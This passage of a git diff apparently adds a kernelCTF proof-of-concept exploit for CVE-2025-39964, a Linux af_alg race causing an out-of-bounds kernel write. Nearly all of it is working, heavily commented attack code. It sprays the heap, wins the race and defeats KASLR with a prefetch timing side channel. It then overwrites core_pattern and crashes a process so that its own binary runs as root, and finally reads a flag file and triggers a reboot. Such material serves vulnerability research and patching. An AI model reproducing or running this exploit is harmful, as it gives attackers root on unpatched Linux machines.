+
+/*
+ * Step 5b: Use mincore to find the exact virtual address in [start, start+4GB)
+ * that corresponds to the physical page the OOB write targets. A page marked
+ * resident (mincore bit = 1) that also contains our spray marker ('a') is the
+ * hit: it is the page that the kernel's arbitrary-write wrote into.
+ */
+size_t search_offset(char *start) {
+ char *pvec = NULL;
+ for (int i = 0; i < MAX_SCAN_ITERATIONS; i++) {
+ mincore((void *)start, 0x100000000ULL, vec);
+ pvec = memchr(vec, 1, 0x100000);
+ if (pvec) {
+ char *leak_offset = start + (pvec - vec) * 0x1000;
+ pvec = memchr((void *)leak_offset, 'a', 0x1000);
+ if (pvec)
+ break;
+ }
+ start += 0x100000000ULL;
+ }
+ if (pvec == NULL)
+ exit(0);
+ printf("\npvec %p %x\n", pvec, pvec[0]);
+ return (size_t)pvec;
+}
+
+int check_core() {
+ /* Check if /proc/sys/kernel/core_pattern has been overwritten */
+ char core_pattern_buf[0x100] = {};
+ int core = open("/proc/sys/kernel/core_pattern", O_RDONLY);
+ read(core, core_pattern_buf, sizeof(core_pattern_buf));
+ close(core);
+ return strncmp(core_pattern_buf, "|/proc/%P/fd/666", 0x10) == 0;
+}
+
+void crash(char *cmd) {
+ int memfd = memfd_create("", 0);
+ /* send our binary to memfd for core_pattern payload */
+ SYSCHK(sendfile(memfd, open("/proc/self/exe", 0), 0, 0xffffffff));
+ /* our binary now at file descriptor 666 */
+ dup2(memfd, 666);
+ close(memfd);
+ while (check_core() == 0)
+ sleep(1);
+ puts("Root shell !!");
+ /* Trigger program crash and cause kernel to execute program from core_pattern
+ * which is our "root" binary */
+ *(size_t *)0 = 0;
+}
+
+size_t bypass_kaslr(u64 base);
+
+int guess_addr(size_t guesss) {
+ for (int i = 0; i < THREAD_NUM; i++) {
+ read(sfd[i][0], buf, 0x1000);
+ read(cfd[1], buf, 1);
+ }
+ *(size_t *)&payload[PAYLOAD_OFFS_TARGET] = guesss;
+ write(cfd[1], buf, 0x100);
+ buf[0] = 'b';
+ int x = send(opfd, buf, 1, MSG_MORE);
+ printf("x: %d\n", x);
+ return x == 1;
+}
+
+int trigger_exploit();
+int main(int argc, char **argv) {
+
+ setvbuf(stdin, 0, 2, 0);
+ setvbuf(stdout, 0, 2, 0);
+ puts("Exploit start");
+ if (argc == 1) {
+ size_t stext = 0;
+ if (getenv("KTEXT"))
+ stext = strtoull(getenv("KTEXT"), 0, 16);
+ else
+ stext = bypass_kaslr(0);
+ /* core_pattern symbol is at a fixed offset from _stext; set MIT=1 for
+ * mitigation target */
+ core_pattern = stext + CORE_PATTERN_LTS_OFFSET;
+ printf("got stext 0x%zx 0x%zx\n", stext, core_pattern);
+ }
+
+ struct rlimit rlim = {.rlim_cur = 0xf000, .rlim_max = 0xf000};
+ setrlimit(RLIMIT_NOFILE, &rlim);
+
+ if (argc > 1) {
+#define SYS_pidfd_getfd 438
+ int pid = strtoull(argv[1], 0, 10);
+ int pfd = syscall(SYS_pidfd_open, pid, 0);
+ int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0);
+ int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0);
+ int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0);
+ dup2(stdinfd, 0);
+ dup2(stdoutfd, 1);
+ dup2(stderrfd, 2);
+ /* Run cat /flag multiple times to ensure output is flushed before reboot */
+ for (int i = 0; i < 6; i++)
+ system("cat /flag");
+
+ system("cat /flag;echo o>/proc/sysrq-trigger");
+ execlp("bash", "bash", NULL);
+ }
+ /* Step 7: fork a watcher that polls core_pattern and triggers crash once
+ * overwritten */
+ if (fork() == 0) {
+ set_cpu(0);
+ setsid();
+ crash("");
+ }
+ /* Retry loop: trigger_exploit() may fail the race; restart on failure */
+ while (1) {
+ if (fork() == 0) {
+ trigger_exploit();
+ exit(0);
+ }
+ wait(NULL);
+ }
+}
+
+int trigger_exploit() {
+ int tfmfd;
+
+ set_cpu(1);
+ SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, cfd));
+
+ /* Step 1: spray heap with crafted msg_control buffers */
+ spray_unix_sockets();
+
+ char *addr = SYSCHK(mmap(0, MMAP_REGION_LEN, PROT_READ | PROT_WRITE,
+ MAP_PRIVATE | MAP_ANON, -1, 0));
+ struct iovec local = {.iov_base = addr, .iov_len = MMAP_REGION_LEN};
+ struct iovec remote = {.iov_base = addr, .iov_len = MMAP_REGION_LEN};
+
+ struct sockaddr_alg sa = {
+ .salg_family = AF_ALG,
+ .salg_type = "skcipher", /* symmetric key cipher */
+ .salg_name = "cbc(aes)", /* AES in CBC mode */
+ };
+
+ /* Step 2: create and bind the AF_ALG transformation socket */
+ tfmfd = socket(AF_ALG, SOCK_SEQPACKET, 0);
+ if (tfmfd == -1) {
+ perror("socket");
+ return 1;
+ }
+
+ if (bind(tfmfd, (struct sockaddr *)&sa, sizeof(sa)) != 0) {
+ perror("bind");
+ close(tfmfd);
+ return 1;
+ }
+
+ unsigned char key[32] = {0};
+ if (setsockopt(tfmfd, SOL_ALG, ALG_SET_KEY, key, sizeof(key)) != 0) {
+ perror("setsockopt");
+ close(tfmfd);
+ return 1;
+ }
+
+ opfd = accept(tfmfd, NULL, 0);
+ if (opfd == -1) {
+ perror("accept");
+ close(tfmfd);
+ return 1;
+ }
+
+ int val = 0x1000;
+
+ struct {
+ struct cmsghdr cmsg;
+ __u32 op;
+ __u32 ivlen;
+ unsigned char iv[16];
+ } __attribute__((__packed__)) msg;
+
+ memset(&msg, 0, sizeof(msg));
+ msg.cmsg.cmsg_level = SOL_ALG;
+ msg.cmsg.cmsg_type = ALG_SET_OP;
+ msg.cmsg.cmsg_len = CMSG_LEN(sizeof(__u32) + sizeof(__u32) + 16);
+
+ msg.op = ALG_OP_ENCRYPT;
+ msg.ivlen = 16;
+ memset(msg.iv, 0x01, 16);
+
+ struct iovec iov = {
+ .iov_base = buf,
+ .iov_len = 0x1000,
+ };
+
+ struct msghdr msgh;
+ memset(&msgh, 0, sizeof(msgh));
+ msgh.msg_iov = &iov;
+ msgh.msg_iovlen = 1;
+ msgh.msg_control = &msg;
+ msgh.msg_controllen = msg.cmsg.cmsg_len;
+
+ /* Step 3: initial sendmsg to initialise the tsgl; advances sgl->cur to 1 */
+ ssize_t n = sendmsg(opfd, &msgh, MSG_MORE);
+ printf("init %ld\n", n);
+
+ /*
+ * Step 3 (cont): advance sgl->cur from 1 to 124 (MAX_SGL_ENTS - 2) using
+ * SGL_MERGE_ITERATIONS = 0x7b send+recv pairs. Each send allocates one sg
+ * entry (cur++); each recv drains the processed entry so the socket stays
+ * writable. The loop comment in the original PR is:
+ * "the loop with 0x7b + the sendmsg and send calls executes 125 times,
+ * matching MAX_SGL_ENTS - 1 = 126 - 1 = 125."
+ */
+ for (int i = 0; i < SGL_MERGE_ITERATIONS; i++) {
+ SYSCHK(send(opfd, buf, 0x1000, MSG_MORE));
+ n = recv(opfd, buf, 0x1000, 0);
+ }
+
+ /* Advance sgl->cur to 125 = MAX_SGL_ENTS - 1 (one slot before the list is
+ * full) */
+ send(opfd, buf, 0x1000, MSG_MORE);
+ SYSCHK(setsockopt(opfd, SOL_SOCKET, SO_SNDBUF, &val, sizeof(val)));
+ printf("setsockopt done\n");
+
+ /*
+ * Step 3 (race): fork two children that race each other:
+ *
+ * Child A (send invalid addr): passes INVALID_USER_ADDR, which causes
+ * af_alg_alloc_tsgl() to allocate a new tsgl (sgl->cur → 0) then fail
+ * in memcpy_from_msg() — leaving ctx->merge = 1 and sgl->cur = 0.
+ *
+ * Child B (send 0x200 bytes): sends a sub-page-size buffer so that
+ * ctx->merge is set to 1 and sgl->cur advances to MAX_SGL_ENTS = 126.
+ *
+ * Desired outcome: both children finish such that ctx->merge == 1 AND the
+ * last tsgl has sgl->cur == 0. The next send() will then use sg[-1].
+ */
+ if (fork() == 0) {
+ /* Child A: trigger new-tsgl allocation then fail — sets sgl->cur = 0 */
+ int x = send(opfd, INVALID_USER_ADDR, 0x400, MSG_MORE);
+ printf("send3 %d\n", x);
+ exit(0);
+ }
+
+ if (fork() == 0) {
+ /* Child B: sub-page send sets ctx->merge = 1 and fills sgl->cur to
+ * MAX_SGL_ENTS */
+ int x = send(opfd, buf, 0x200, MSG_MORE);
+ printf("send2 %d\n", x);
+ exit(0);
+ }
+
+ /*
+ * @sleep(desc="wait for both fork children to reach their send() calls and
+ * set ctx->merge=1 with sgl->cur=0 before we recv()")
+ */
+ sleep(1);
+ n = recv(opfd, buf, 0x1000, 0);
+ printf("recv2 %ld\n", n);
+ wait(NULL);
+
+ /* Step 4: release spray threads so they re-send their crafted payloads */
+ for (int i = 0; i < THREAD_NUM; i++) {
+ write(cfd[1], buf, 1);
+ }
+
+ n = recv(opfd, buf, 0x1000, 0);
+ printf("recv2 %ld\n", n);
+
+ memset(buf, 'z', 0x1000);
+ wait(NULL);
+
+ /* Step 5: map userspace oracle region for the binary search */
+ allocate_map();
+
+ /* Step 5 (OOB trigger): with ctx->merge=1 and sgl->cur=0 this send uses
+ * sg[-1].page_link from our sprayed payload — triggering the OOB write.
+ * Returns -1 if the write destination is unmapped (race failed); 1 if mapped.
+ */
+ int x = send(opfd, buf, 1, MSG_MORE);
+
+ if (x == 1) {
+ puts("Race fail");
+ exit(0);
+ }
+
+ /*
+ * Step 5 (binary search oracle):
+ *
+ * Background:
+ * sg[-1].page_link is effectively a pointer to a struct page in vmemmap.
+ * The kernel computes the write destination as:
+ * dest = page_address(sg_page(sg)) + sg->offset + sg->length
+ * = page_offset_base + (page_link - vmemmap_base) / 64 * PAGE_SIZE
+ * + offset + length
+ * With page_link ≈ 0, the pfn arithmetic wraps to a very large value, and
+ * (page_offset_base + pfn * PAGE_SIZE) wraps further to land within our
+ * userspace oracle region [SCAN_START_ADDR, SCAN_END_ADDR).
+ *
+ * Oracle:
+ * send() returns 1 → the write destination is in a mapped page (success).
+ * send() returns -1 → the destination is unmapped (copy_from_user failed).
+ * By progressively munmap-ing halves of the oracle region we can determine
+ * which physical page corresponds to the OOB write target.
+ *
+ * Binary search (8 iterations → narrows range from SCAN_END_ADDR to ~340 MB):
+ * Each iteration j tests: "if I decrease page_link by half_range/64, does
+ * the write still succeed?"
+ * - Decreasing page_link by Δ shifts dest by Δ*64 bytes (since each
+ * struct-page unit = 64 bytes = one PAGE_SIZE/64 step in physmap).
+ * - The test delta (SCAN_END_ADDR >> (7+j)) in page_link units equals
+ * half_range = (SCAN_END_ADDR >> (1+j)) in dest-address units.
+ * If the shifted oracle still succeeds → dest is in the *upper* half →
+ * unmap the lower half and advance start.
+ * Otherwise → dest is in the *lower* half → unmap the upper half.
+ */
+ size_t oracle;
+ size_t leak_offset = 0;
+ int xcnt = 0;
+ for (int k = 0; k < MAX_SCAN_ITERATIONS; k++) {
+ for (int i = 0; i < THREAD_NUM; i++) {
+ read(sfd[i][0], buf, 0x1000);
+ read(cfd[1], buf, 1);
+ }
+ *(size_t *)&payload[PAYLOAD_OFFS_TARGET] -= (SCAN_END_ADDR >> 6);
+ write(cfd[1], buf, 0x100);
+ buf[0] = 'a';
+ x = send(opfd, buf, 1, MSG_MORE);
+ if (x == 1) {
+ puts("");
+ xcnt++;
+ oracle = *(size_t *)&payload[PAYLOAD_OFFS_TARGET];
+ char *start = (void *)(0ULL);
+ for (int j = 0; j < 8; j++) {
+ printf("loop j: %d\n", j);
+ x = guess_addr(oracle - (SCAN_END_ADDR >> (7 + j)));
+ if (x == 1) {
+ xcnt++;
+ start += (SCAN_END_ADDR >> (1 + j)); /* upper half */
+ munmap(start - (SCAN_END_ADDR >> (1 + j)),
+ (SCAN_END_ADDR >> (1 + j)));
+ } else {
+ munmap(start + (SCAN_END_ADDR >> (1 + j)),
+ (SCAN_END_ADDR >> (1 + j)));
+ }
+ }
+ *(size_t *)&payload[PAYLOAD_OFFS_TARGET] = oracle;
+ /* search_offset returns the exact userspace VA of the OOB-written page */
+ leak_offset = search_offset(start) + xcnt;
+ printf("leak_offset %zx\n", leak_offset);
+ printf("%zx\n", *(size_t *)&payload[PAYLOAD_OFFS_TARGET]);
+
+ break;
+ }
+ }
+
+ if (leak_offset == 0)
+ exit(0);
+
+ for (int i = 0; i < THREAD_NUM; i++) {
+ read(sfd[i][0], buf, 0x1000);
+ read(cfd[1], buf, 1);
+ }
+ *(size_t *)&payload[PAYLOAD_OFFS_TARGET] = oracle;
+ write(cfd[1], buf, 0x100);
+
+ /*
+ * Step 6: redirect the OOB write to core_pattern.
+ *
+ * leak_offset is the VA of the currently-targeted physical page.
+ * core_pattern is the KASLR-adjusted kernel VA of core_pattern[].
+ *
+ * First, align within-page: send adjust_offset bytes so that after the
+ * advance the write starts at the same within-page offset as core_pattern.
+ */
+ size_t adjust_offset =
+ PAGE_SIZE + (core_pattern & PAGE_MASK) - (leak_offset & PAGE_MASK);
+ leak_offset += adjust_offset;
+
+ memset(buf, 'z', 0x1000);
+ SYSCHK(send(opfd, buf, adjust_offset - 1, MSG_MORE));
+ SYSCHK(send(opfd, buf, 1, MSG_MORE));
+
+ printf("sg->len overflow check %x\n", *(char *)(leak_offset - 1));
+ if (*(char *)(leak_offset - 1) != 'z')
+ leak_offset -= 0x100000000ULL;
+
+ for (int i = 0; i < THREAD_NUM; i++) {
+ read(sfd[i][0], buf, 0x1000);
+ read(cfd[1], buf, 1);
+ }
+
+ /*
+ * Now adjust payload[PAYLOAD_OFFS_TARGET] (= sg[-1].page_link) so that
+ * page_address(sg_page(sg)) points to the physical page holding core_pattern.
+ * The >> 6 (or / 64) is actually a simplification of the formula
+ * (addr / 0x1000) * 64. We divide the address by 0x1000 to find the page
+ * index, and then multiply by 64 because each memory page has a page_struct
+ * that is exactly 64 bytes long.
+ * payload[PAYLOAD_OFFS_TARGET] is sg[-1].page_link, which controls dest via
+ * the formula described in the binary search comment above.
+ */
+ *(size_t *)&payload[PAYLOAD_OFFS_TARGET] +=
+ (((core_pattern & ~PAGE_MASK) - (leak_offset & ~PAGE_MASK)) >> 6);
+ printf("%zx\n", *(size_t *)&payload[PAYLOAD_OFFS_TARGET]);
+ write(cfd[1], buf, 0x100);
+ /* Step 6 (write): send the core_pattern string; kernel copies it to
+ * core_pattern[] */
+ char mcore[64] = "|/proc/%P/fd/666 %P";
+ SYSCHK(send(opfd, mcore, 64, MSG_MORE));
+ PAUSE;
+
+ return 0;
+}
+
+/*
+ * Serialized TSC read opening a timing window: mfence + RDTSCP order the
+ * counter read after prior memory ops; the trailing lfence keeps the probed
+ * access from starting early. Returns the full 64-bit TSC (EDX:EAX
+ * recombined below).
+ */
+inline __attribute__((always_inline)) uint64_t rdtsc_begin() {
+  uint64_t a, d;
+  asm volatile("mfence\n\t"
+               "RDTSCP\n\t"
+               "mov %%rdx, %0\n\t"
+               "mov %%rax, %1\n\t"
+               "xor %%rax, %%rax\n\t"
+               "lfence\n\t"
+               : "=r"(d), "=r"(a)
+               :
+               : "%rax", "%rbx", "%rcx", "%rdx");
+  a = (d << 32) | a;
+  return a;
+}
+
+/*
+ * Serialized TSC read closing a timing window: the leading lfence waits for
+ * the probed access to retire before RDTSCP samples the counter; mfence
+ * fences subsequent stores. Returns the full 64-bit TSC.
+ */
+inline __attribute__((always_inline)) uint64_t rdtsc_end() {
+  uint64_t a, d;
+  asm volatile("xor %%rax, %%rax\n\t"
+               "lfence\n\t"
+               "RDTSCP\n\t"
+               "mov %%rdx, %0\n\t"
+               "mov %%rax, %1\n\t"
+               "mfence\n\t"
+               : "=r"(d), "=r"(a)
+               :
+               : "%rax", "%rbx", "%rcx", "%rdx");
+  a = (d << 32) | a;
+  return a;
+}
+
+/*
+ * Issue a prefetchnta + prefetcht2 pair against @p. Prefetches do not fault
+ * on kernel addresses; their latency (measured by flushandreload) is the
+ * side-channel signal used by bypass_kaslr.
+ */
+void prefetch(void *p) {
+  asm volatile("prefetchnta (%0)\n"
+               "prefetcht2 (%0)\n"
+               :
+               : "r"(p));
+}
+
+/*
+ * Time one prefetch pair against @addr between the serialized TSC reads and
+ * return the elapsed cycle delta. bypass_kaslr compares these deltas across
+ * candidate addresses to find the kernel text mapping.
+ */
+size_t flushandreload(void *addr) /* row miss */
+{
+  size_t time = rdtsc_begin();
+  prefetch(addr);
+  size_t delta = rdtsc_end() - time;
+  return delta;
+}
+
+/*
+ * KASLR bypass via Flush+Reload side channel.
+ *
+ * Uncomment KASLR_BYPASS_INTEL for Intel CPUs (kernelCTF remote instances).
+ * Keep commented for GitHub CI (AMD/other) to use the sliding-window variant.
+ * Alternatively pass -DKASLR_BYPASS_INTEL to the compiler without touching
+ * source.
+ */
+// #define KASLR_BYPASS_INTEL
+size_t bypass_kaslr(u64 base) {
+  /*
+   * Derive the randomized kernel text base by timing prefetches against
+   * candidate addresses (STEP-spaced in [START, END)) and majority-voting
+   * across trials. If @base is already nonzero it is returned unchanged.
+   */
+  if (!base) {
+#ifdef KASLR_BYPASS_INTEL
+#define OFFSET 0
+#define START (0xffffffff81000000ull + OFFSET)
+#define END (0xffffffffD0000000ull + OFFSET)
+#define STEP 0x0000000001000000ull
+    while (1) {
+      u64 bases[7] = {0};
+      for (int vote = 0; vote < ARRAY_LEN(bases); vote++) {
+        size_t times[(END - START) / STEP] = {};
+        uint64_t addrs[(END - START) / STEP];
+
+        for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
+          times[ti] = ~0;
+          addrs[ti] = START + STEP * (u64)ti;
+        }
+
+        /* Keep the minimum latency seen per candidate over 16 rounds. */
+        for (int i = 0; i < 16; i++) {
+          for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
+            u64 addr = addrs[ti];
+            size_t t = flushandreload((void *)addr);
+            if (t < times[ti]) {
+              times[ti] = t;
+            }
+          }
+        }
+
+        size_t minv = ~0;
+        /*
+         * FIX: mini was declared size_t, so "mini < 0" below could never be
+         * true and a stale (size_t)-1 would have indexed addrs[] out of
+         * bounds if no candidate beat minv. A signed type keeps the -1
+         * "no candidate" sentinel meaningful.
+         */
+        long mini = -1;
+        for (int ti = 0; ti < ARRAY_LEN(times) - 1; ti++) {
+          if (times[ti] < minv) {
+            mini = ti;
+            minv = times[ti];
+          }
+        }
+
+        if (mini < 0) {
+          return -1;
+        }
+
+        bases[vote] = addrs[mini];
+      }
+
+      /* Boyer-Moore majority vote over the per-trial winners. */
+      int c = 0;
+      for (int i = 0; i < ARRAY_LEN(bases); i++) {
+        if (c == 0) {
+          base = bases[i];
+        } else if (base == bases[i]) {
+          c++;
+        } else {
+          c--;
+        }
+      }
+
+      /* Verify the candidate really has an absolute majority; retry if not. */
+      c = 0;
+      for (int i = 0; i < ARRAY_LEN(bases); i++) {
+        if (base == bases[i]) {
+          c++;
+        }
+      }
+      if (c > ARRAY_LEN(bases) / 2) {
+        base -= OFFSET;
+        goto got_base;
+      }
+
+      printf("majority vote failed:\n");
+      printf("base = %llx with %d votes\n", base, c);
+    }
+#else
+#define START (0xffffffff81000000ull)
+#define END (0xffffffffc0000000ull)
+#define STEP 0x0000000000200000ull
+#define NUM_TRIALS 9
+/* largest contiguous mapped area at the beginning of _stext */
+#define WINDOW_SIZE 11
+
+    while (1) {
+      u64 bases[NUM_TRIALS] = {0};
+
+      for (int vote = 0; vote < ARRAY_LEN(bases); vote++) {
+        size_t times[(END - START) / STEP] = {};
+        uint64_t addrs[(END - START) / STEP];
+
+        for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
+          times[ti] = ~0;
+          addrs[ti] = START + STEP * (u64)ti;
+        }
+
+        /* Keep the minimum latency seen per candidate over 16 rounds. */
+        for (int i = 0; i < 16; i++) {
+          for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
+            u64 addr = addrs[ti];
+            size_t t = flushandreload((void *)addr);
+            if (t < times[ti]) {
+              times[ti] = t;
+            }
+          }
+        }
+
+        /* Sliding window: pick the WINDOW_SIZE run with the largest summed
+         * latency. */
+        uint64_t max = 0;
+        int max_i = 0;
+        for (int ti = 0; ti < ARRAY_LEN(times) - WINDOW_SIZE; ti++) {
+          uint64_t sum = 0;
+          for (int i = 0; i < WINDOW_SIZE; i++) {
+            sum += times[ti + i];
+          }
+          if (sum > max) {
+            max = sum;
+            max_i = ti;
+          }
+        }
+
+        bases[vote] = addrs[max_i];
+      }
+
+      /* Boyer-Moore majority vote over the per-trial winners. */
+      int c = 0;
+      for (int i = 0; i < ARRAY_LEN(bases); i++) {
+        if (c == 0) {
+          base = bases[i];
+        } else if (base == bases[i]) {
+          c++;
+        } else {
+          c--;
+        }
+      }
+
+      /* Verify the candidate really has an absolute majority; retry if not. */
+      c = 0;
+      for (int i = 0; i < ARRAY_LEN(bases); i++) {
+        if (base == bases[i]) {
+          c++;
+        }
+      }
+      if (c > ARRAY_LEN(bases) / 2) {
+        goto got_base;
+      }
+
+      printf("majority vote failed:\n");
+      printf("base = %llx with %d votes\n", base, c);
+    }
+#endif
+  }
+
+got_base:
+
+  printf("using kernel base %llx\n", base);
+
+  return base;
+}
diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/mitigation-v4-6.6/Makefile b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/mitigation-v4-6.6/Makefile
new file mode 100644
index 000000000..3eabaca61
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/mitigation-v4-6.6/Makefile
@@ -0,0 +1,5 @@
+all: exploit
+
+exploit: exploit.c
+ gcc -static-pie -o exploit exploit.c
+
diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/mitigation-v4-6.6/exploit b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/mitigation-v4-6.6/exploit
new file mode 100755
index 000000000..a06f17248
Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/mitigation-v4-6.6/exploit differ
diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/mitigation-v4-6.6/exploit.c b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/mitigation-v4-6.6/exploit.c
new file mode 100644
index 000000000..3c109bbd3
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/mitigation-v4-6.6/exploit.c
@@ -0,0 +1,893 @@
+/*
+ * Exploit for CVE-2025-39964 — Linux af_alg out-of-bounds write
+ * (mitigation-v4-6.6)
+ *
+ * Vulnerability: af_alg_sendmsg() has a race condition allowing two concurrent
+ * sendmsg calls to produce ctx->merge=1 with sgl->cur=0 simultaneously.
+ * In this state the merge branch computes sg = sgl->sg + sgl->cur - 1 = sg[-1],
+ * which is an out-of-bounds read into the previous heap chunk. The
+ * sg[-1].page_link value from the previous chunk controls the destination of
+ * memcpy_from_msg(), giving an arbitrary kernel write primitive.
+ *
+ * Exploit chain (mitigation-v4-6.6):
+ * 1. Spray 0x100 AF_UNIX socket pairs; each thread sends a crafted msghdr
+ * whose msg_control (payload[]) lands in the heap slot just before an
+ * af_alg_tsgl. payload[PAYLOAD_OFFS_TARGET] controls sg[-1].page_link = write
+ * destination.
+ * 2. Set up an AF_ALG socket (AES-CBC); advance sgl->cur to MAX_SGL_ENTS-1 =
+ * 125 using 1 sendmsg + SGL_MERGE_ITERATIONS send/recv pairs + 1 more send.
+ * 3. Fork two children that race: one sets ctx->merge=1
+ * (sgl->cur→MAX_SGL_ENTS), the other allocates a new sgl (sgl->cur→0) via an
+ * invalid userspace pointer.
+ * 4. With ctx->merge=1 and sgl->cur=0, the next sendmsg triggers the OOB write
+ * to the address derived from payload[PAYLOAD_OFFS_TARGET].
+ * 5. Map [SCAN_START_ADDR, SCAN_END_ADDR) in MAP_CHUNK_SIZE (2 GB) chunks so
+ * the OOB write destination (which wraps into userspace due to page_link
+ * arithmetic) falls in a mapped region. An 8-step binary search (oracle =
+ * send() return value) narrows the target to a ~340 MB window; mincore then
+ * locates the exact page.
+ * 6. Adjust the write destination via page_link arithmetic to point to the
+ * core_pattern kernel symbol, then write "|/proc/%P/fd/666 %P".
+ * 7. A forked child watches for core_pattern to change, then faults (NULL
+ * deref), causing the kernel to execute our binary as root via core_pattern.
+ * 8. Re-exec reads /flag via pidfd_getfd() on the parent's stdio descriptors.
+ */
+
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <stdint.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <err.h>
+#include <sched.h>
+#include <pthread.h>
+#include <sys/socket.h>
+#include <sys/mman.h>
+#include <sys/sendfile.h>
+#include <sys/syscall.h>
+#include <sys/uio.h>
+#include <sys/wait.h>
+#include <sys/resource.h>
+#ifndef SYS_pidfd_getfd
+#define SYS_pidfd_getfd 438
+#endif
+
+#ifndef SYS_pidfd_open
+#define SYS_pidfd_open 434
+#endif
+
+size_t vmemmap_base = 0xffffea0000000000ULL;
+size_t page_offset_base = 0xffff888000000000ULL;
+size_t core_pattern = 0xffffffff8420d520ULL;
+
+/* Socket options */
+#define ALG_SET_KEY 1
+#define ALG_SET_IV 2
+#define ALG_SET_OP 3
+#define ALG_SET_AEAD_ASSOCLEN 4
+#define ALG_SET_AEAD_AUTHSIZE 5
+#define ALG_SET_DRBG_ENTROPY 6
+#define ALG_SET_KEY_BY_KEY_SERIAL 7
+
+/* Operations */
+#define ALG_OP_DECRYPT 0
+#define ALG_OP_ENCRYPT 1
+
+typedef unsigned char u8;
+typedef unsigned short u16;
+typedef unsigned int u32;
+typedef unsigned long long u64;
+typedef char i8;
+typedef short i16;
+typedef int i32;
+typedef long long i64;
+#define ARRAY_LEN(x) (sizeof(x) / sizeof(x[0]))
+
+#define __u32 uint32_t
+#define __u16 uint16_t
+#define __u8 uint8_t
+#define PAUSE \
+ { \
+ int x; \
+ printf(":"); \
+ read(0, &x, 1); \
+ }
+
+#define SYSCHK(x) \
+ ({ \
+ typeof(x) __res = (x); \
+ if (__res == (typeof(x))-1) \
+ err(1, "SYSCHK(" #x ")"); \
+ __res; \
+ })
+
+#ifndef SYS_process_vm_readv
+#define SYS_process_vm_readv 310
+#endif
+
+/* Number of AF_UNIX pairs to spray; one pair per exploit thread */
+#define THREAD_NUM 0x100
+
+/*
+ * Size of each private anonymous mapping used as the OOB write oracle region:
+ * 512 PTEs per page * PAGE_SIZE = 2 MB physical coverage per mmap entry.
+ */
+#define MMAP_REGION_LEN (0x1000 / 8 * 0x1000)
+
+/*
+ * Start of the contiguous userspace region we map for the binary-search oracle.
+ * We start just above the 4 GB boundary to avoid the low userspace region.
+ */
+#define SCAN_START_ADDR 0x100000000ULL
+
+/* Maximum number of mincore windows tried during the page-address scan */
+#define MAX_SCAN_ITERATIONS 0x50
+
+/*
+ * Unmapped address passed as invalid user pointer to trigger the race
+ * condition: the first 4 MB of virtual address space (0–0xfff000) is always
+ * unmapped.
+ */
+#define INVALID_USER_ADDR ((void *)0xfff000)
+
+/*
+ * Byte offset of sg[-1].page_link inside the sprayed msg_control payload:
+ * af_alg_tsgl is allocated in a 4096-byte slab object.
+ * sgl->sg[0] starts at byte 24 (sizeof(af_alg_tsgl)).
+ * sg[-1] = sgl->sg[-1] lies 32 bytes (sizeof(scatterlist)) before sg[0],
+ * i.e. at byte 24 - 32 = -8 relative to the tsgl object start.
+ * In the *previous* 4096-byte heap object that is offset 4096 - 8 = 0xff8.
+ * scatterlist.page_link is the first field (offset 0), so payload[0xff8]
+ * directly controls the page_link that the OOB write uses as its destination.
+ */
+#define PAYLOAD_OFFS_TARGET 0xff8
+
+/*
+ * Number of send/recv iterations to advance sgl->cur from 1 to 124
+ * (MAX_SGL_ENTS-2). MAX_SGL_ENTS = (4096 - sizeof(af_alg_tsgl)) /
+ * sizeof(scatterlist) - 1 = (4096 - 24) / 32 - 1 = 126. One initial sendmsg
+ * sets cur=1; SGL_MERGE_ITERATIONS send+recv pairs bring it to 1 + 0x7b = 124;
+ * one more send brings it to 125 = MAX_SGL_ENTS - 1.
+ */
+#define SGL_MERGE_ITERATIONS 0x7b
+
+/* Compile-time unslid base of kernel text (_stext); used when computing symbol
+ * offsets */
+#define KERNEL_TEXT_BASE 0xffffffff81000000UL
+
+/*
+ * KASLR-invariant offset of core_pattern from _stext in mitigation-v4-6.6.
+ * core_pattern is at 0xffffffff83db3720; _stext is at KERNEL_TEXT_BASE.
+ */
+#define CORE_PATTERN_MIT_OFFSET (0xffffffff83db3720UL - KERNEL_TEXT_BASE)
+
+/*
+ * The mitigation kernel's physmap base is shifted up by 4 GB relative to
+ * LTS/COS. This additional page_link adjustment (4 GB / 64 = 0x4000000)
+ * is applied statically rather than via a runtime environment variable.
+ */
+#define MITIGATION_PHYSMAP_EXTRA_OFFSET (0x100000000ULL >> 6)
+
+/* Upper bound of the userspace oracle scan region [SCAN_START_ADDR,
+ * SCAN_END_ADDR) */
+#define SCAN_END_ADDR 0x500000000000ULL
+
+/* Size of each anonymous 2 GB mmap chunk used to cover the oracle region */
+#define MAP_CHUNK_SIZE 0x80000000ULL
+
+#ifndef PAGE_SIZE
+#define PAGE_SIZE 0x1000
+#endif
+/* Page offset mask for within-page alignment (PAGE_SIZE - 1) */
+#define PAGE_MASK (PAGE_SIZE - 1)
+
+pthread_t tid[THREAD_NUM];
+
+/* Shared scratch buffer used by spray threads and the main exploit loop */
+char buf[0x10000];
+char vec[0x100000];
+
+int cfd[2];
+int sfd[THREAD_NUM][2];
+char payload[0x1000];
+int opfd;
+
+struct sockaddr_alg {
+ __u16 salg_family;
+ __u8 salg_type[14];
+ __u32 salg_feat;
+ __u32 salg_mask;
+ __u8 salg_name[64];
+};
+
+/* Pin the calling thread/process to CPU @i (best effort; errors ignored). */
+void set_cpu(int i) {
+  cpu_set_t mask;
